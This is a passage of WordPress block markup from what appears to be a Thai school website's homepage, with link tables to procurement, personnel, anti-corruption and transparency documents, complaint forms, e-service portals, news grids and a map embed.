data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 